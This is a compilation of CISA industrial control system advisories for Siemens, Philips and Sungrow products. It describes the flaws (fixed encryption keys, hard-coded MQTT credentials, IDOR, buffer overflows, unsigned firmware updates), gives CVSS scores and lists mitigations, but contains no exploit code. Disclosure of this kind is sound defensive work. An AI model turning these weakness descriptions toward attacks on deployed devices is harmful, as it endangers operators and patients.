As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, see Siemens' ProductCERT Security Advisories (CERT Services | Services | Siemens Global).
Successful exploitation of these vulnerabilities could allow an authenticated attacker to alter the secure boot configuration or to disable the BIOS password.
Siemens reports that the following products are affected:
The affected devices have insufficient protection mechanism for the EFI (Extensible Firmware Interface) variables stored on the device. This could allow an authenticated attacker to alter the secure boot configuration without proper authorization by directly communicating with the flash controller.
CVE-2024-56181 has been assigned to this vulnerability. A CVSS v3 base score of 8.2 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2024-56181. A base score of 8.4 has been calculated; the CVSS vector string is (CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:H).
The affected devices have insufficient protection mechanism for the EFI (Extensible Firmware Interface) variables stored on the device. This could allow an authenticated attacker to disable the BIOS password without proper authorization by directly communicating with the flash controller.
CVE-2024-56182 has been assigned to this vulnerability. A CVSS v3 base score of 8.2 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2024-56182. A base score of 8.4 has been calculated; the CVSS vector string is (CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:H).
Siemens reported these vulnerabilities to CISA.
Siemens has identified the following specific workarounds and mitigations users can apply to reduce risk:
As a general security measure, Siemens recommends protecting network access to devices with appropriate mechanisms. To operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for industrial security and following recommendations in the product manuals.
Additional information on industrial security by Siemens can be found on the Siemens industrial security webpage
For more information see the associated Siemens security advisory SSA-216014 in HTML and CSAF.
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. These vulnerabilities are not exploitable remotely.
Successful exploitation of these vulnerabilities could allow an attacker to replay the session of the logged in ISCV user and gain access to patient records.
Philips reports the following versions of Intellispace Cardiovascular (ISCV), an image and information management product, are affected:
A flaw exists in the Windows login flow where an AuthContext token can be exploited for replay attacks and authentication bypass.
CVE-2025-2230 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.7 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).
A CVSS v4 score has also been calculated for CVE-2025-2230. A base score of 8.5 has been calculated; the CVSS vector string is (CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N).
A token is created using the username, current date/time, and a fixed AES-128 encryption key, which is the same across all installations.
CVE-2025-2229 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.7 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).
A CVSS v4 score has also been calculated for CVE-2025-2229. A base score of 8.5 has been calculated; the CVSS vector string is (CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N).
Joe Dillon reported these vulnerabilities to Philips.
Philips recommends the following mitigations:
Refer to the Philips advisory for more details.
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. These vulnerabilities are not exploitable remotely.
As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, see Siemens' ProductCERT Security Advisories (CERT Services | Services | Siemens Global).
Successful exploitation of these vulnerabilities could allow an attacker to send garbage to OpenVPN log, cause high CPU load, or extend the validity of a closing session.
Siemens reports the following products are affected:
A malicious openvpn peer can send garbage to OpenVPN log or cause high CPU load.
CVE-2024-5594 has been assigned to this vulnerability. A CVSS v3 base score of 5.4 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L).
A CVSS v4 score has also been calculated for CVE-2024-5594. A base score of 5.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N).
OpenVPN from 2.6.0 through 2.6.10 in a server role accepts multiple exit notifications from authenticated clients which will extend the validity of a closing session.
CVE-2024-28882 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N).
A CVSS v4 score has also been calculated for CVE-2024-28882. A base score of 7.1 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N).
Siemens reported these vulnerabilities to CISA.
Siemens has released a new version for SINEMA Remote Connect Server and recommends updating to V3.2 SP3 or later version.
As a general security measure, Siemens recommends protecting network access to devices with appropriate mechanisms. To operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for industrial security and following recommendations in the product manuals.
Additional information on industrial security by Siemens can be found on the Siemens industrial security webpage
For more information see the associated Siemens security advisory SSA-073066 in HTML and CSAF.
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.
As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, see Siemens' ProductCERT Security Advisories (CERT Services | Services | Siemens Global).
Successful exploitation of these vulnerabilities could cause the application to crash or potentially lead to arbitrary code execution.
Siemens reports the following products are affected:
The affected applications contain an out-of-bounds write vulnerability when parsing a specially crafted WRL file. This could allow an attacker to execute code in the context of the current process.
CVE-2025-23396 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2025-23396. A base score of 7.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
The affected application is vulnerable to memory corruption while parsing specially crafted WRL files. This could allow an attacker to execute code in the context of the current process.
CVE-2025-23397 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2025-23397. A base score of 7.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
The affected application is vulnerable to memory corruption while parsing specially crafted WRL files. This could allow an attacker to execute code in the context of the current process.
CVE-2025-23398 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2025-23398. A base score of 7.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted WRL files. This could allow an attacker to execute code in the context of the current process.
CVE-2025-23399 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2025-23399. A base score of 7.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
The affected application is vulnerable to memory corruption while parsing specially crafted WRL files. This could allow an attacker to execute code in the context of the current process.
CVE-2025-23400 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2025-23400. A base score of 7.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted WRL files. This could allow an attacker to execute code in the context of the current process.
CVE-2025-23401 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2025-23401. A base score of 7.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
The affected applications contain a use-after-free vulnerability that could be triggered while parsing specially crafted WRL files. An attacker could leverage this vulnerability to execute code in the context of the current process.
CVE-2025-23402 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2025-23402. A base score of 7.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
The affected applications contain an out-of-bounds read past the end of an allocated structure while parsing specially crafted WRL files. This could allow an attacker to execute code in the context of the current process.
CVE-2025-27438 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2025-27438. A base score of 7.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N).
Jin Huang from ADLab of Venustech and Michael Heinzl reported these vulnerabilities to Siemens.
Siemens has released new versions for the affected products and recommends to update to the latest versions:
To reduce risk, Siemens recommends that users not open untrusted WRL files in affected applications.
As a general security measure, Siemens recommends protecting network access to devices with appropriate mechanisms. To operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for industrial security and following recommendations in the product manuals.
Additional information on industrial security by Siemens can be found on the Siemens industrial security webpage
For more information see the associated Siemens security advisory SSA-050438 in HTML and CSAF.
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. These vulnerabilities are not exploitable remotely.
CISA released thirteen Industrial Control Systems (ICS) advisories on March 13, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.
CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.
As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, see Siemens' ProductCERT Security Advisories (CERT Services | Services | Siemens Global).
Successful exploitation of these vulnerabilities could allow an attacker to bypass application authentication and gain access to the data managed by the server.
Siemens reports that the following products are affected:
Vulnerability in the OPC UA .NET standard stack before 1.5.374.158 allows an unauthorized attacker to bypass application authentication when the deprecated Basic128Rsa15 security policy is enabled.
CVE-2024-42512 has been assigned to this vulnerability. A CVSS v3 base score of 7.4 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).
A CVSS v4 score has also been calculated for CVE-2024-42512. A base score of 9.1 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N).
Vulnerability in the OPC UA .NET standard stack before 1.5.374.158 allows an unauthorized attacker to bypass application authentication when using HTTPS endpoints.
CVE-2024-42513 has been assigned to this vulnerability. A CVSS v3 base score of 9.1 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).
A CVSS v4 score has also been calculated for CVE-2024-42513. A base score of 9.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N).
Siemens reported these vulnerabilities to CISA.
Siemens has identified the following specific workarounds and mitigations users can apply to reduce risk:
As a general security measure, Siemens recommends protecting network access to devices with appropriate mechanisms. To operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for industrial security and following recommendations in the product manuals.
Additional information on industrial security by Siemens can be found on the Siemens industrial security webpage
For more information see the associated Siemens security advisory SSA-858251 in HTML and CSAF.
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.
Successful exploitation of these vulnerabilities could result in attackers being able to access and could modify sensitive information.
The following Sungrow software products are affected:
The Android app for iSolarCloud explicitly ignores certificate errors and is vulnerable to adversary-in-the-middle attacks. This may allow an attacker to impersonate the iSolarCloud server and communicate with the Android app.
CVE-2024-50691 has been assigned to this vulnerability. A CVSS v3.1 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N).
A CVSS v4 score has also been calculated for CVE-2024-50691. A base score of 8.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N).
The iSolarCloud Android mobile application uses an insecure AES key to encrypt client data (insufficient entropy). This may allow attackers to decrypt intercepted communications between the mobile app and iSolarCloud.
CVE-2024-50684 has been assigned to this vulnerability. A CVSS v3.1 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N).
A CVSS v4 score has also been calculated for CVE-2024-50684. A base score of 8.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N).
The iSolarCloud API is vulnerable to multiple insecure direct object references (IDOR) via the powerStationService API model. This vulnerability may allow an attacker to gain unauthorized access to user data and potentially modify key identifying data values.
CVE-2024-50685 has been assigned to this vulnerability. A CVSS v3.1 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N).
A CVSS v4 score has also been calculated for CVE-2024-50685. A base score of 6.9 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N).
The Solar iCloud API is vulnerable to multiple insecure direct object references (IDOR) via the userService API model. This vulnerability may allow an attacker to gain unauthorized access to user data and potentially modify key identifying data values.
CVE-2024-50693 has been assigned to this vulnerability. A CVSS v3.1 base score of 8.2 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N).
A CVSS v4 score has also been calculated for CVE-2024-50693. A base score of 9.2 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N).
The Solar iCloud API is vulnerable to multiple insecure direct object references (IDOR) via the orgService API model. This vulnerability may allow an attacker to gain unauthorized access to user data and potentially modify key identifying data values.
CVE-2024-50689 has been assigned to this vulnerability. A CVSS v3.1 base score of 8.2 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N).
A CVSS v4 score has also been calculated for CVE-2024-50689. A base score of 9.2 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N).
The Solar iCloud API is vulnerable to multiple insecure direct object references (IDOR) via the commonService API model. This vulnerability may allow an attacker to gain unauthorized access to user data and potentially modify key identifying data values.
CVE-2024-50686 has been assigned to this vulnerability. A CVSS v3.1 base score of 5.3 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).
A CVSS v4 score has also been calculated for CVE-2024-50686. A base score of 6.9 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N).
The Solar iCloud API is vulnerable to multiple insecure direct object references (IDOR) via the devService API model. This vulnerability may allow an attacker to gain unauthorized access to user data and potentially modify key identifying data values.
CVE-2024-50687 has been assigned to this vulnerability. A CVSS v3.1 base score of 5.3 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).
A CVSS v4 score has also been calculated for CVE-2024-50687. A base score of 6.9 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N).
The iSolarCloud Android application and the cloud use hard-coded MQTT credentials for exchanging the device telemetry. This vulnerability may allow an attacker to gain unauthorized access to user accounts, sensitive information, and execute arbitrary code.
CVE-2024-50688 has been assigned to this vulnerability. A CVSS v3.1 base score of 5.3 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).
A CVSS v4 score has also been calculated for CVE-2024-50688. A base score of 6.9 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N).
The WiNet's module firmware contains hardcoded MQTT credentials that could allow an attacker to impersonate a device-facing MQTT broker. This vulnerability may allow an attacker to gain unauthorized access to user accounts, sensitive information, and execute arbitrary code.
CVE-2024-50692 has been assigned to this vulnerability. A CVSS v3.1 base score of 8.1 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2024-50692. A base score of 9.5 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H).
The WiNet WebUI contains a hard-coded password that can be used to decrypt all firmware updates. This vulnerability can allow an attacker to gain unauthorized access to accounts.
CVE-2024-50690 has been assigned to this vulnerability. A CVSS v3.1 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N).
A CVSS v4 score has also been calculated for CVE-2024-50690. A base score of 6.9 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N).
When copying the time stamp read from an MQTT message, the underlying code does not check the bounds of the buffer that is used to store the message. This may lead to a stack-based buffer overflow in which an attacker could potentially execute arbitrary code, remotely.
CVE-2024-50694 has been assigned to this vulnerability. A CVSS v3.1 base score of 8.1 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2024-50694. A base score of 9.5 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H).
When decrypting MQTT messages, the code that parses specific TLV fields does not have sufficient bounds checks. This may result in a stack-based buffer overflow in which an attacker could potentially execute arbitrary code, remotely.
CVE-2024-50697 has been assigned to this vulnerability. A CVSS v3.1 base score of 8.1 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2024-50697. A base score of 9.5 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H).
There is a potential stack-based buffer overflow when parsing MQTT messages, due to missing MQTT topic bounds checks. The affected products are vulnerable to a stack-based buffer overflow which may allow an attacker to remotely execute arbitrary code.
CVE-2024-50695 has been assigned to this vulnerability. A CVSS v3.1 base score of 8.1 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2024-50695. A base score of 9.5 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H).
The affected products are vulnerable to a heap-based buffer overflow, due to bounds checks of the MQTT message content. This vulnerability may allow an attacker to remotely execute arbitrary code.
CVE-2024-50698 has been assigned to this vulnerability. A CVSS v3.1 base score of 8.1 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2024-50698. A base score of 9.5 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H).
The affected products lack proper integrity checks during the update process. This vulnerability allows an attacker to send a specific MQTT message to install potentially harmful firmware files hosted on an attacker-controlled server. This could result in unauthorized control of affected devices.
CVE-2024-50696 has been assigned to this vulnerability. A CVSS v3.1 base score of 8.1 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2024-50696. A base score of 9.5 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H).
Daniel dos Santos, Stanislav Dashevskyi, and Francesco La Spina of Forescout Technologies reported these vulnerabilities to CISA.
Sungrow has released updated versions of affected firmware. Users are encouraged to apply version WINET-SV200.001.00.P028 or higher. Users should also update their iSolarCloud Android App to the latest version via device app store. The iSolarCloud has been repaired and requires no further user action.
For more information refer to Sungrow's security notice.
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.
As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, see Siemens' ProductCERT Security Advisories (CERT Services | Services | Siemens Global).
Successful exploitation of these vulnerabilities could allow an attacker to overflow memory buffers, impersonate a legitimate user, maintain longer session times, gain elevated privileges, and execute code remotely.
Siemens reports that the following products are affected:
The tap-windows6 driver version 9.26 and earlier does not properly check the size data of incoming write operations which an attacker can use to overflow memory buffers, resulting in a bug check and potentially arbitrary code execution in kernel space.
CVE-2024-1305 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2024-1305. A base score of 9.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
If an attacker with SeImeprsonatePrivilege manages to create a named pipe server with a name matching that used by the "Interactive Service", user interfaces such as OpenVPN-GUI connecting to it could allow the attacker to impersonate the user running the UI.
CVE-2024-4877 has been assigned to this vulnerability. A CVSS v3 base score of 4.9 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N).
A CVSS v4 score has also been calculated for CVE-2024-4877. A base score of 6.9 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N).
The interactive service in OpenVPN 2.6.9 and earlier allows the OpenVPN service pipe to be accessed remotely which allows a remote attacker to interact with the privileged OpenVPN interactive service.
CVE-2024-24974 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
A CVSS v4 score has also been calculated for CVE-2024-24974. A base score of 8.7 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N).
The interactive service in OpenVPN 2.6.9 and earlier allows an attacker to send data causing a stack overflow which can be used to execute arbitrary code with more privileges.
CVE-2024-27459 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2024-27459. A base score of 8.5 has been calculated; the CVSS vector string is (CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
OpenVPN plug-ins on Windows with OpenVPN 2.6.9 and earlier could be loaded from any directory which allows an attacker to load an arbitrary plug-in which can be used to interact with the privileged OpenVPN interactive service.
CVE-2024-27903 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2024-27903. A base score of 9.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
